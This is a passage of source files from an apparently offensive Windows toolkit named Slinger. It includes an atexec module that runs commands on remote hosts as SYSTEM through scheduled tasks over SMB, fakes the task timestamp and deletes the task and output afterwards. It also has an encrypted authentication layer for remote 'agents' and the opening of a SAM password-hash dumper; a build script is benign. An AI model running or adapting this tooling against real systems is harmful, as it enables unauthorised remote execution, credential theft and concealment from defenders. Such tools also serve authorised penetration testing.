the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /src/slingerpkg/lib/atexec.py: -------------------------------------------------------------------------------- 1 | import ntpath 2 | from time import sleep 3 | from slingerpkg.utils.printlib import * 4 | from slingerpkg.lib.dcetransport import * 5 | from slingerpkg.utils.common import enum_struct, generate_random_date, validate_xml, xml_escape 6 | from tabulate import tabulate 7 | import os 8 | import traceback 9 | 10 | 11 | class atexec: 12 | def __init__(self): 13 | print_debug("ATExec Module Loaded!") 14 | 15 | def _cmd_split(self, cmdline): 16 | cmdline = cmdline.split(" ", 1) 17 | cmd = cmdline[0] 18 | args = cmdline[1] if len(cmdline) > 1 else "" 19 | 20 | return [cmd, args] 21 | 22 | def _create_task(self, args): 23 | # Connection should already be established by caller 24 | # Don't call setup_dce_transport() or _connect() here 25 | 26 | cmd = "cmd.exe" 27 | # arguments = "/C %s > %%windir%%\\Temp\\%s 2>&1" % (self.__command, tmpFileName) 28 | share_path = args.share_path 29 | # remove trailing backslash 30 | share_path = share_path.rstrip("\\") 31 | cmd = "cmd.exe" 32 | if not args.sn: 33 | random_save_name = generate_random_string(8, 10) + ".txt" 34 | else: 35 | random_save_name = args.sn 36 | # save_file_path = args.path + f"{share_path}\\{random_save_name}" 37 | save_file_path = ntpath.join(share_path, random_save_name) 38 | arguments = f"/C {args.command} > {save_file_path} 2>&1" 39 | timestamp = generate_random_date() 40 | xml_escaped_args = xml_escape(arguments) 41 | xml = f""" 42 | 43 | 44 | {xml_escape(args.ta)} 45 | {xml_escape(args.td)} 46 | \\{xml_escape(args.tn)} 47 | 48 | 49 | 50 | {timestamp} 51 | true 52 | 53 | 1 54 | 55 | 56 | 57 | 58 | 59 | S-1-5-18 60 | HighestAvailable 61 | 62 | 63 | 64 | IgnoreNew 65 | false 66 | false 67 | true 68 | false 69 | 70 | true 71 | false 72 | 73 | true 74 | true 75 | true 76 | false 77 | false 78 | P3D 79 | 7 80 | 81 | 82 | 83 | {xml_escape(cmd)} 84 | {xml_escaped_args} 85 | 86 | 87 | 88 | """ 89 | print_debug(f"Task '{args.tn}' will save output to: {save_file_path}") 90 | resp = self.dce_transport._create_task(args.tn, args.tf, xml) 91 | return resp, random_save_name 92 | 93 | def atexec(self, args): 94 | 95 | task_name = args.tn 96 | task_author = args.ta 97 | task_description = args.td 98 | task_command = args.command 99 | task_folder = args.tf 100 | 101 | # get a list of shares 102 | share_info_dict = self.list_shares(args=None, echo=False, ret=True) 103 | # print(share_info_dict) 104 | share_exists = False 105 | if share_info_dict is None or len(share_info_dict) == 0: 106 | print_bad("Failed to list shares") 107 | return 108 | # check if the share exists 109 | for share_info in share_info_dict: 110 | if share_info["name"] == (args.sh).upper(): 111 | share_exists = True 112 | # Ensure proper path construction with backslashes 113 | share_root = share_info["path"].rstrip("\\") # Remove trailing backslash 114 | user_path = args.sp.lstrip("\\").rstrip( 115 | "\\" 116 | ) # Remove only leading/trailing backslashes 117 | args.share_path = f"{share_root}\\{user_path}" 118 | print_debug(f"Using share path: {args.share_path}") 119 | break 120 | 121 | if not share_exists: 122 | print_bad(f"Share '{args.sh}' does not exist") 123 | return 124 | 125 | # Connect to the pipe 126 | self.setup_dce_transport() 127 | self.dce_transport._connect("atsvc") 128 | 129 | # Create the task 130 | save_file_name = None 131 | try: 132 | response, save_file_name = self._create_task(args) 133 | if response["ErrorCode"] == 0: 134 | print_good(f"Task '{args.tn}' created successfully") 135 | else: 136 | print_bad(f"Failed to create task '{args.tn}'") 137 | return 138 | except Exception as e: 139 | print_debug(f"Exception: {e}", sys.exc_info()) 140 | if "ERROR_ALREADY_EXISTS" in str(e): 141 | print_warning(f"Task file '{args.tn}' already exists, please delete it first") 142 | return 143 | 144 | # Reconnect to the pipe 145 | self.dce_transport._connect("atsvc") 146 | 147 | # Run the task 148 | try: 149 | full_task_path = ntpath.join(task_folder, task_name) 150 | response = self.dce_transport._run_task(full_task_path) 151 | if response["ErrorCode"] == 0: 152 | print_good(f"Task '{full_task_path}' executed successfully") 153 | else: 154 | print_bad(f"Failed to execute task '{full_task_path}'") 155 | return 156 | except Exception as e: 157 | print_debug(f"Exception during task run: {e}", sys.exc_info()) 158 | return 159 | 160 | # Reconnect to the pipe 161 | self.dce_transport._connect("atsvc") 162 | 163 | # Delete the task 164 | try: 165 | response = self.dce_transport._delete_task(full_task_path) 166 | if response["ErrorCode"] == 0: 167 | print_good(f"Task '{args.tn}' deleted successfully") 168 | else: 169 | print_bad(f"Failed to delete task '{args.tn}'") 170 | return 171 | except Exception as e: 172 | print_debug(f"Exception: {e}", sys.exc_info()) 173 | return 174 | 175 | # Retrieve the output 176 | try: 177 | # Create relative path from share root (no leading backslashes) 178 | # Ensure proper path construction with backslashes 179 | relative_path = args.sp.lstrip("\\").rstrip( 180 | "\\" 181 | ) # Remove only leading/trailing backslashes 182 | args.remote_path = f"{relative_path}\\{save_file_name}" 183 | # Ensure we're connected to the share for file operations 184 | print_debug(f"Current share: {getattr(self, 'share', 'None')}, needed: {args.sh}") 185 | if not hasattr(self, "share") or self.share != args.sh: 186 | print_debug(f"Connecting to share: {args.sh}") 187 | self.connect_share(args) 188 | else: 189 | print_debug(f"Already on correct share: {self.share}") 190 | print_debug(f"Retrieving output from: {args.remote_path}") 191 | sleep(args.wait) 192 | print_info(f"Command output:") 193 | self.cat(args, echo=False) # Show the output content without download progress 194 | self.delete(args.remote_path) 195 | except Exception as e: 196 | print_debug(f"Exception: {e}", sys.exc_info()) 197 | return 198 | 199 | def atexec_handler(self, args): 200 | # Check if connected to a share (same pattern as other SMB commands) 201 | if not self.check_if_connected(): 202 | return 203 | 204 | # Generate default task name if not provided 205 | if args.tn is None: 206 | from slingerpkg.utils.common import generate_random_string 207 | 208 | args.tn = f"SlingerTask_{generate_random_string(6, 8)}" 209 | 210 | # Update share to match currently connected share 211 | if hasattr(self, "share") and self.share: 212 | args.sh = self.share 213 | 214 | # Adjust default path based on share type 215 | if args.sp == "\\Users\\Public\\Downloads\\" and args.sh.upper() == "ADMIN$": 216 | args.sp = "\\Temp\\" 217 | print_debug(f"Using ADMIN$ appropriate path: {args.sp}") 218 | 219 | cmd = None 220 | # handle mistakes in which the user specifies a full path 221 | if ":" in args.sp: 222 | print_bad("Invalid path name, please use a relative path") 223 | return 224 | if args.shell: 225 | print_warning( 226 | "Entering semi-interactive mode. Type 'exit' to return to the main menu." 227 | ) 228 | print_info("Tip: Type 'config' to view current atexec configuration") 229 | while cmd != "exit": 230 | print_debug("Type 'config' to view current settings") 231 | cmd = input("atexec> ") 232 | if cmd == "exit": 233 | break 234 | elif cmd == "config": 235 | # Display current atexec configuration 236 | print_info("Current atexec configuration:") 237 | print_info(f" Task Name (-tn): {args.tn}") 238 | print_info(f" Share (-sh): {args.sh}") 239 | print_info(f" Path (-sp): {args.sp}") 240 | print_info(f" Author (-ta): {args.ta}") 241 | print_info(f" Description (-td): {args.td}") 242 | print_info(f" Folder (-tf): {args.tf}") 243 | print_info(f" Wait Time (-w): {args.wait}s") 244 | print_info(f" Save Name (-sn): {args.sn}") 245 | print() 246 | continue 247 | 248 | # Create a shallow copy of args to avoid state pollution between commands 249 | # Note: Cannot use deepcopy due to socket objects in args 250 | import copy 251 | 252 | shell_args = copy.copy(args) 253 | shell_args.command = cmd 254 | 255 | # Generate a unique task name for each shell command 256 | from slingerpkg.utils.common import generate_random_string 257 | 258 | shell_args.tn = f"SlingerTask_{generate_random_string(6, 8)}" 259 | 260 | # Display arguments for user reference 261 | print_info(f"Executing with arguments:") 262 | print_info(f" Command: {shell_args.command}") 263 | print_info(f" Task Name: {shell_args.tn}") 264 | print_info(f" Share: {shell_args.sh}") 265 | print_info(f" Path: {shell_args.sp}") 266 | print_info(f" Author: {shell_args.ta}") 267 | print_info(f" Wait Time: {shell_args.wait}s") 268 | print() 269 | 270 | self.atexec(shell_args) 271 | else: 272 | # handle if no command is specified 273 | if args.command is None: 274 | print_bad("No command specified") 275 | return 276 | self.atexec(args) 277 | -------------------------------------------------------------------------------- /scripts/build_script.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | import re 3 | import sys 4 | import subprocess 5 | from unittest.mock import MagicMock 6 | from pathlib import Path 7 | 8 | import toml 9 | 10 | # Dynamically add the src directory to the Python path 11 | current_dir = Path(__file__).resolve().parent 12 | src_path = current_dir.parent / "src" 13 | sys.path.insert(0, str(src_path)) 14 | 15 | from slingerpkg.utils.cli import setup_cli_parser 16 | 17 | 18 | def parse_requirements(filename): 19 | try: 20 | with open(filename, "r") as file: 21 | return [line.strip() for line in file.readlines() if line.strip()] 22 | except FileNotFoundError: 23 | print(f"File {filename} not found. Skipping requirements parsing.") 24 | return [] 25 | 26 | 27 | def extract_commands_and_args(parser): 28 | commands = {} 29 | for action in parser._actions: 30 | if isinstance(action, argparse._SubParsersAction): 31 | for command, subparser in action.choices.items(): 32 | usage = subparser.format_usage() if hasattr(subparser, "format_usage") else "" 33 | usage = usage.replace("usage: slinger ", "").strip() 34 | desc = getattr(subparser, "description", "No description provided") 35 | help_text = f"{usage}\n{desc}" if usage else desc 36 | 37 | commands[command] = { 38 | "description": desc, 39 | "help": help_text, 40 | "epilog": getattr(subparser, "epilog", None), 41 | "arguments": [], 42 | "subcommands": {}, 43 | } 44 | 45 | # Extract regular arguments 46 | for sub_action in subparser._actions: 47 | if isinstance(sub_action, argparse._StoreAction): 48 | commands[command]["arguments"].append( 49 | { 50 | "name": sub_action.dest, 51 | "help": sub_action.help, 52 | "choices": sub_action.choices, 53 | "default": sub_action.default, 54 | "required": ( 55 | sub_action.required 56 | if hasattr(sub_action, "required") 57 | else False 58 | ), 59 | } 60 | ) 61 | # Extract nested subparsers (like wmiexec query, eventlog query, etc.) 62 | elif isinstance(sub_action, argparse._SubParsersAction): 63 | for subcommand, sub_subparser in sub_action.choices.items(): 64 | sub_usage = ( 65 | sub_subparser.format_usage() 66 | if hasattr(sub_subparser, "format_usage") 67 | else "" 68 | ) 69 | sub_usage = sub_usage.replace("usage: slinger ", "").strip() 70 | sub_desc = getattr( 71 | sub_subparser, "description", "No description provided" 72 | ) 73 | sub_help_text = f"{sub_usage}\n{sub_desc}" if sub_usage else sub_desc 74 | 75 | commands[command]["subcommands"][subcommand] = { 76 | "description": sub_desc, 77 | "help": sub_help_text, 78 | "epilog": getattr(sub_subparser, "epilog", None), 79 | "arguments": [], 80 | } 81 | 82 | # Extract arguments for the nested subcommand 83 | for sub_sub_action in sub_subparser._actions: 84 | if isinstance(sub_sub_action, argparse._StoreAction): 85 | commands[command]["subcommands"][subcommand][ 86 | "arguments" 87 | ].append( 88 | { 89 | "name": sub_sub_action.dest, 90 | "help": sub_sub_action.help, 91 | "choices": sub_sub_action.choices, 92 | "default": sub_sub_action.default, 93 | "required": ( 94 | sub_sub_action.required 95 | if hasattr(sub_sub_action, "required") 96 | else False 97 | ), 98 | } 99 | ) 100 | return commands 101 | 102 | 103 | def generate_markdown(commands, output_file): 104 | with open(output_file, "w") as md_file: 105 | md_file.write("# CLI Commands Documentation\n\n") 106 | for command, details in commands.items(): 107 | md_file.write(f"## `{command}`\n\n") 108 | md_file.write(f"**Description:** {details['description']}\n\n") 109 | md_file.write(f"**Help:**\n```\n{details['help']}\n```\n\n") 110 | if details["epilog"]: 111 | md_file.write(f"**Example Usage:**\n```\n{details['epilog']}\n```\n\n") 112 | if details["arguments"]: 113 | md_file.write("### Arguments\n\n") 114 | for arg in details["arguments"]: 115 | md_file.write( 116 | f"- **`{arg['name']}`**: {arg['help'] or 'No description provided'}\n".replace( 117 | "(default: %(default)s)", "" 118 | ) 119 | ) 120 | if arg["choices"]: 121 | md_file.write(f" - Choices: {', '.join(arg['choices'])}\n") 122 | if arg["default"] is not None: 123 | md_file.write(f" - Default: `{arg['default']}`\n") 124 | required_text = "Yes" if arg["required"] else "No" 125 | md_file.write(f" - Required: {required_text}\n\n") 126 | 127 | # Handle nested subcommands (like wmiexec query, eventlog query) 128 | if details.get("subcommands"): 129 | md_file.write("### Subcommands\n\n") 130 | for subcommand, sub_details in details["subcommands"].items(): 131 | md_file.write(f"#### `{command} {subcommand}`\n\n") 132 | md_file.write(f"**Description:** {sub_details['description']}\n\n") 133 | md_file.write(f"**Help:**\n```\n{sub_details['help']}\n```\n\n") 134 | if sub_details["epilog"]: 135 | md_file.write(f"**Example Usage:**\n```\n{sub_details['epilog']}\n```\n\n") 136 | if sub_details["arguments"]: 137 | md_file.write("##### Arguments\n\n") 138 | for arg in sub_details["arguments"]: 139 | md_file.write( 140 | f"- **`{arg['name']}`**: {arg['help'] or 'No description provided'}\n".replace( 141 | "(default: %(default)s)", "" 142 | ) 143 | ) 144 | if arg["choices"]: 145 | choices_text = ", ".join(map(str, arg["choices"])) 146 | md_file.write(f" - Choices: {choices_text}\n") 147 | if arg["default"] is not None: 148 | md_file.write(f" - Default: `{arg['default']}`\n") 149 | required_text = "Yes" if arg["required"] else "No" 150 | md_file.write(f" - Required: {required_text}\n\n") 151 | md_file.write("---\n\n") 152 | else: 153 | md_file.write("---\n\n") 154 | 155 | 156 | def get_package_dir(): 157 | """Locate the main package directory dynamically.""" 158 | src_path = Path(__file__).resolve().parent.parent / "src" 159 | for package_dir in src_path.iterdir(): 160 | if package_dir.is_dir() and (package_dir / "__init__.py").exists(): 161 | return package_dir 162 | raise FileNotFoundError("Could not locate the main package directory containing __init__.py") 163 | 164 | 165 | def get_version_from_init(package_dir): 166 | """Extract the version from the top-level __init__.py file.""" 167 | init_file = package_dir / "__init__.py" 168 | version_pattern = r"^__version__\s*=\s*['\"]([^'\"]+)['\"]" 169 | with open(init_file, "r") as f: 170 | for line in f: 171 | match = re.match(version_pattern, line) 172 | if match: 173 | return match.group(1) 174 | raise ValueError("Version not found in __init__.py") 175 | 176 | 177 | def update_version_in_pyproject(pyproject_file, new_version): 178 | """Update the version in pyproject.toml.""" 179 | pyproject_data = toml.load(pyproject_file) 180 | if "project" in pyproject_data and "version" in pyproject_data["project"]: 181 | pyproject_data["project"]["version"] = new_version 182 | with open(pyproject_file, "w") as f: 183 | toml.dump(pyproject_data, f) 184 | print(f"Updated version in {pyproject_file} to {new_version}") 185 | 186 | 187 | def run_build(): 188 | """Run the Python build process.""" 189 | try: 190 | # Ensure `build` is installed 191 | subprocess.run(["pip", "install", "--upgrade", "build"], check=True) 192 | 193 | # Run the build command 194 | subprocess.run(["python", "-m", "build"], check=True) 195 | print("Build completed successfully!") 196 | except subprocess.CalledProcessError as e: 197 | print(f"Build failed: {e}") 198 | except FileNotFoundError: 199 | print("Ensure that Python and the `build` module are installed.") 200 | 201 | 202 | def generate_help_markdown(): 203 | # Create a mock slingerClient 204 | mock_client = MagicMock() 205 | 206 | # Set up the parser using the mock client 207 | parser = setup_cli_parser(mock_client) 208 | 209 | # Extract commands and arguments 210 | commands = extract_commands_and_args(parser) 211 | 212 | # Generate the markdown file in docs/ directory 213 | docs_dir = Path(__file__).resolve().parent.parent / "docs" 214 | docs_dir.mkdir(exist_ok=True) # Ensure docs directory exists 215 | output_file = docs_dir / "cli_menu.md" 216 | generate_markdown(commands, output_file) 217 | print(f"Markdown documentation generated: {output_file}") 218 | 219 | 220 | def update_dependencies(): 221 | # Parse requirements 222 | dependencies = parse_requirements("requirements.txt") 223 | if dependencies: 224 | print("Dependencies:", dependencies) 225 | else: 226 | print("No dependencies found.") 227 | 228 | # Update dependencies in pyproject.toml 229 | pyproject_file = current_dir.parent / "pyproject.toml" 230 | pyproject_data = toml.load(pyproject_file) 231 | 232 | # Update dependencies 233 | pyproject_data["project"]["dependencies"] = dependencies 234 | with open(pyproject_file, "w") as f: 235 | toml.dump(pyproject_data, f) 236 | print(f"Updated dependencies in {pyproject_file}") 237 | 238 | 239 | def main(): 240 | # Locate necessary files 241 | current_dir = Path(__file__).resolve().parent 242 | pyproject_file = current_dir.parent / "pyproject.toml" 243 | package_dir = get_package_dir() 244 | 245 | # Get version from __init__.py 246 | init_version = get_version_from_init(package_dir) 247 | print(f"Current version in __init__.py: {init_version}") 248 | 249 | # Get version from pyproject.toml 250 | pyproject_data = toml.load(pyproject_file) 251 | pyproject_version = pyproject_data.get("project", {}).get("version") 252 | print(f"Current version in pyproject.toml: {pyproject_version}") 253 | 254 | # Update pyproject.toml if versions do not match 255 | if pyproject_version != init_version: 256 | update_version_in_pyproject(pyproject_file, init_version) 257 | 258 | # Run the build process 259 | generate_help_markdown() 260 | update_dependencies() 261 | run_build() 262 | 263 | 264 | if __name__ == "__main__": 265 | main() 266 | -------------------------------------------------------------------------------- /src/slingerpkg/lib/agent_crypto.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | """ 3 | Client-side cryptographic authentication for Slinger agents. 4 | 5 | Implements a simplified challenge-response authentication protocol: 6 | 7 | 1. Agent sends 16-byte random nonce 8 | 2. Client responds with HMAC-SHA256(passphrase, nonce) + encrypted command 9 | 3. Agent verifies HMAC and derives session key from nonce+passphrase 10 | 4. All future messages encrypted with session-specific AES-256-GCM key 11 | 12 | Security properties: 13 | - Requires attacker to have: network capture, agent binary, and active participation 14 | - Replay attacks prevented by random nonce per session 15 | - Forward secrecy through session-specific keys 16 | - No plaintext passphrase in agent (only SHA256 hash) 17 | """ 18 | 19 | import os 20 | import hmac 21 | import hashlib 22 | from typing import Tuple, Optional 23 | from cryptography.hazmat.primitives.ciphers.aead import AESGCM 24 | from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC 25 | from cryptography.hazmat.primitives import hashes 26 | from cryptography.hazmat.backends import default_backend 27 | 28 | 29 | class AgentAuthProtocol: 30 | """ 31 | Simplified challenge-response authentication for Slinger agents. 32 | 33 | Protocol flow: 34 | 1. Client receives 16-byte nonce from agent 35 | 2. Client computes HMAC-SHA256(passphrase, nonce) as authentication proof 36 | 3. Client derives session key using PBKDF2-HMAC-SHA256(passphrase, nonce, 10k iterations) 37 | 4. All messages encrypted with AES-256-GCM using session key 38 | 39 | Message format: [12-byte IV][ciphertext][16-byte auth tag] 40 | """ 41 | 42 | # Protocol constants 43 | NONCE_SIZE = 16 # bytes 44 | HMAC_SIZE = 32 # bytes (SHA-256) 45 | IV_SIZE = 12 # bytes (GCM standard) 46 | TAG_SIZE = 16 # bytes (GCM standard) 47 | PBKDF2_ITERATIONS = 10000 48 | SESSION_KEY_SIZE = 32 # bytes (AES-256) 49 | 50 | def __init__(self): 51 | """Initialize authentication protocol handler.""" 52 | self.session_key: Optional[bytes] = None 53 | self.authenticated = False 54 | 55 | def handle_challenge(self, nonce: bytes, passphrase: str) -> Tuple[bytes, bytes]: 56 | """ 57 | Handle agent's challenge and prepare authentication response. 58 | 59 | This method: 60 | 1. Computes HMAC-SHA256(passphrase, nonce) for authentication 61 | 2. Derives session key using PBKDF2-HMAC-SHA256 62 | 63 | Args: 64 | nonce: 16-byte random challenge from agent 65 | passphrase: User's passphrase (same one hashed in agent binary) 66 | 67 | Returns: 68 | Tuple of (hmac_response, session_key): 69 | - hmac_response: 32-byte HMAC to prove knowledge of passphrase 70 | - session_key: 32-byte derived key for encrypting future messages 71 | 72 | Raises: 73 | ValueError: If nonce size is incorrect 74 | """ 75 | if len(nonce) != self.NONCE_SIZE: 76 | raise ValueError(f"Invalid nonce size: {len(nonce)} (expected {self.NONCE_SIZE})") 77 | 78 | # Compute HMAC-SHA256(SHA256(passphrase), nonce) for authentication 79 | # Must match agent's auth_protocol.h which uses passphrase_hash 80 | passphrase_bytes = passphrase.encode("utf-8") 81 | passphrase_hash = hashlib.sha256(passphrase_bytes).digest() 82 | hmac_response = hmac.new(key=passphrase_hash, msg=nonce, digestmod=hashlib.sha256).digest() 83 | 84 | # Derive session key using PBKDF2-HMAC-SHA256 85 | session_key = self.derive_session_key(passphrase, nonce) 86 | 87 | return hmac_response, session_key 88 | 89 | def derive_session_key(self, passphrase: str, nonce: bytes) -> bytes: 90 | """ 91 | Derive session-specific encryption key using PBKDF2-HMAC-SHA256. 92 | 93 | Uses SHA256(passphrase) as the password and nonce as salt. 94 | This matches the C++ agent implementation in auth_protocol.h. 95 | 96 | Args: 97 | passphrase: User's passphrase 98 | nonce: 16-byte random nonce used as salt 99 | 100 | Returns: 101 | 32-byte session key for AES-256-GCM encryption 102 | """ 103 | # Hash the passphrase first to match C++ agent 104 | passphrase_bytes = passphrase.encode("utf-8") 105 | passphrase_hash = hashlib.sha256(passphrase_bytes).digest() 106 | 107 | kdf = PBKDF2HMAC( 108 | algorithm=hashes.SHA256(), 109 | length=self.SESSION_KEY_SIZE, 110 | salt=nonce, 111 | iterations=self.PBKDF2_ITERATIONS, 112 | backend=default_backend(), 113 | ) 114 | return kdf.derive(passphrase_hash) 115 | 116 | def initialize_session(self, session_key: bytes) -> bool: 117 | """ 118 | Initialize the session with a derived session key. 119 | 120 | After calling handle_challenge(), use this method to store the 121 | session key and mark the protocol as authenticated. 122 | 123 | Args: 124 | session_key: 32-byte session key from handle_challenge() 125 | 126 | Returns: 127 | True if initialization successful, False otherwise 128 | """ 129 | try: 130 | if len(session_key) != self.SESSION_KEY_SIZE: 131 | raise ValueError(f"Invalid session key size: {len(session_key)}") 132 | 133 | self.session_key = session_key 134 | self.authenticated = True 135 | return True 136 | except Exception as e: 137 | print(f"Error initializing session: {e}") 138 | return False 139 | 140 | def encrypt_message(self, plaintext: str) -> Optional[str]: 141 | """ 142 | Encrypt message with AES-256-GCM using session key. 143 | 144 | Message format: ENCRYPTED|iv_hex|tag_hex|ciphertext_hex 145 | 146 | The AESGCM.encrypt() method returns [ciphertext || tag], where: 147 | - ciphertext: encrypted data 148 | - tag: 16-byte authentication tag 149 | 150 | Args: 151 | plaintext: Message to encrypt 152 | 153 | Returns: 154 | Formatted encrypted message string, or None on error 155 | """ 156 | if not self.authenticated or not self.session_key: 157 | print("Error: Cannot encrypt - not authenticated") 158 | return None 159 | 160 | try: 161 | # Generate random 12-byte IV for GCM 162 | iv = os.urandom(self.IV_SIZE) 163 | 164 | # Encrypt with AES-256-GCM 165 | aesgcm = AESGCM(self.session_key) 166 | plaintext_bytes = plaintext.encode("utf-8") 167 | 168 | # Encrypt returns: ciphertext || 16-byte authentication tag 169 | ciphertext_with_tag = aesgcm.encrypt(iv, plaintext_bytes, None) 170 | 171 | # Split ciphertext and tag (last 16 bytes is tag) 172 | ciphertext = ciphertext_with_tag[: -self.TAG_SIZE] 173 | tag = ciphertext_with_tag[-self.TAG_SIZE :] 174 | 175 | # Format: ENCRYPTED|iv_hex|tag_hex|ciphertext_hex 176 | encrypted_msg = f"ENCRYPTED|{iv.hex()}|{tag.hex()}|{ciphertext.hex()}" 177 | return encrypted_msg 178 | 179 | except Exception as e: 180 | print(f"Encryption error: {e}") 181 | return None 182 | 183 | def decrypt_message(self, encrypted_msg: str) -> Optional[str]: 184 | """ 185 | Decrypt message with AES-256-GCM using session key. 186 | 187 | Expected format: ENCRYPTED|iv_hex|tag_hex|ciphertext_hex 188 | 189 | Args: 190 | encrypted_msg: Formatted encrypted message string 191 | 192 | Returns: 193 | Decrypted plaintext string, or None on error 194 | """ 195 | if not self.authenticated or not self.session_key: 196 | print("Error: Cannot decrypt - not authenticated") 197 | return None 198 | 199 | try: 200 | # Validate format 201 | if not encrypted_msg.startswith("ENCRYPTED|"): 202 | print("Error: Invalid encrypted message format") 203 | return None 204 | 205 | parts = encrypted_msg.split("|") 206 | if len(parts) != 4: 207 | print(f"Error: Invalid encrypted message parts (expected 4, got {len(parts)})") 208 | return None 209 | 210 | # Parse components 211 | iv = bytes.fromhex(parts[1]) 212 | tag = bytes.fromhex(parts[2]) 213 | ciphertext = bytes.fromhex(parts[3]) 214 | 215 | # Validate sizes 216 | if len(iv) != self.IV_SIZE: 217 | print(f"Error: Invalid IV size (expected {self.IV_SIZE}, got {len(iv)})") 218 | return None 219 | if len(tag) != self.TAG_SIZE: 220 | print(f"Error: Invalid tag size (expected {self.TAG_SIZE}, got {len(tag)})") 221 | return None 222 | 223 | # Reconstruct ciphertext with tag for decryption 224 | ciphertext_with_tag = ciphertext + tag 225 | 226 | # Decrypt with AES-256-GCM 227 | aesgcm = AESGCM(self.session_key) 228 | plaintext_bytes = aesgcm.decrypt(iv, ciphertext_with_tag, None) 229 | 230 | return plaintext_bytes.decode("utf-8") 231 | 232 | except Exception as e: 233 | print(f"Decryption error: {e}") 234 | return None 235 | 236 | def is_authenticated(self) -> bool: 237 | """ 238 | Check if authentication handshake completed successfully. 239 | 240 | Returns: 241 | True if session is authenticated and ready for encryption 242 | """ 243 | return self.authenticated 244 | 245 | def reset(self): 246 | """ 247 | Reset the authentication state and securely clear session key. 248 | 249 | Call this when disconnecting or when authentication fails. 250 | """ 251 | if self.session_key: 252 | # Overwrite session key memory before deletion 253 | # (Note: Python's memory management makes true zeroing difficult, 254 | # but this is better than nothing) 255 | self.session_key = b"\x00" * len(self.session_key) 256 | 257 | self.session_key = None 258 | self.authenticated = False 259 | 260 | 261 | # Compatibility wrapper for existing code that uses the old interface 262 | class AgentAuthProtocolLegacy: 263 | """ 264 | Legacy compatibility wrapper for existing code. 265 | 266 | This provides backward compatibility with the old initialize_with_passphrase() 267 | interface, but uses a static agent_id as salt since we now use nonce-based 268 | session keys. 269 | """ 270 | 271 | def __init__(self): 272 | self.session_key: Optional[bytes] = None 273 | self.authenticated = False 274 | 275 | def initialize_with_passphrase(self, passphrase: str, agent_id: str) -> bool: 276 | """ 277 | Legacy method: Derive session key from passphrase using PBKDF2. 278 | 279 | Note: This is kept for backward compatibility but is less secure than 280 | the challenge-response protocol. Use AgentAuthProtocol for new code. 281 | 282 | Args: 283 | passphrase: User's passphrase 284 | agent_id: Agent identifier (used as PBKDF2 salt) 285 | 286 | Returns: 287 | True if key derivation successful 288 | """ 289 | try: 290 | # Use PBKDF2 to derive 256-bit AES key from passphrase 291 | kdf = PBKDF2HMAC( 292 | algorithm=hashes.SHA256(), 293 | length=32, # 256 bits for AES-256 294 | salt=agent_id.encode("utf-8"), 295 | iterations=100000, # Higher iterations for static keys 296 | backend=default_backend(), 297 | ) 298 | self.session_key = kdf.derive(passphrase.encode("utf-8")) 299 | self.authenticated = True 300 | return True 301 | except Exception as e: 302 | print(f"Error deriving session key: {e}") 303 | return False 304 | 305 | def encrypt_message(self, plaintext: str) -> Optional[str]: 306 | """Encrypt message - same as AgentAuthProtocol.""" 307 | if not self.authenticated or not self.session_key: 308 | return None 309 | 310 | try: 311 | aesgcm = AESGCM(self.session_key) 312 | iv = os.urandom(12) 313 | plaintext_bytes = plaintext.encode("utf-8") 314 | ciphertext_with_tag = aesgcm.encrypt(iv, plaintext_bytes, None) 315 | ciphertext = ciphertext_with_tag[:-16] 316 | tag = ciphertext_with_tag[-16:] 317 | return f"ENCRYPTED|{iv.hex()}|{tag.hex()}|{ciphertext.hex()}" 318 | except Exception as e: 319 | print(f"Encryption error: {e}") 320 | return None 321 | 322 | def decrypt_message(self, encrypted_msg: str) -> Optional[str]: 323 | """Decrypt message - same as AgentAuthProtocol.""" 324 | if not self.authenticated or not self.session_key: 325 | return None 326 | 327 | try: 328 | if not encrypted_msg.startswith("ENCRYPTED|"): 329 | return None 330 | parts = encrypted_msg.split("|") 331 | if len(parts) != 4: 332 | return None 333 | iv = bytes.fromhex(parts[1]) 334 | tag = bytes.fromhex(parts[2]) 335 | ciphertext = bytes.fromhex(parts[3]) 336 | ciphertext_with_tag = ciphertext + tag 337 | aesgcm = AESGCM(self.session_key) 338 | plaintext_bytes = aesgcm.decrypt(iv, ciphertext_with_tag, None) 339 | return plaintext_bytes.decode("utf-8") 340 | except Exception as e: 341 | print(f"Decryption error: {e}") 342 | return None 343 | 344 | def is_authenticated(self) -> bool: 345 | """Check if authentication completed successfully.""" 346 | return self.authenticated 347 | -------------------------------------------------------------------------------- /src/slingerpkg/lib/hashdump.py: -------------------------------------------------------------------------------- 1 | # https://github.com/vincd/samdumpy/blob/master/samdum.py 2 | 3 | from struct import unpack, pack 4 | import binascii 5 | from collections import namedtuple 6 | from Crypto.Hash import MD5 7 | from Crypto.Cipher import ARC4, DES, AES 8 | 9 | NK_ID = 0x6B6E 10 | NK_ROOT = 0x2C 11 | 12 | NK_HDR = namedtuple( 13 | "NK_HDR", 14 | "id type t1 t2 unk1 parent_off subkey_num unk2 lf_off unk3 value_cnt value_off sk_off classname_off unk41 unk42 unk43 unk44 unk5 name_len classname_len key_name", 15 | ) 16 | LF_HDR = namedtuple("LF_HDR", "id 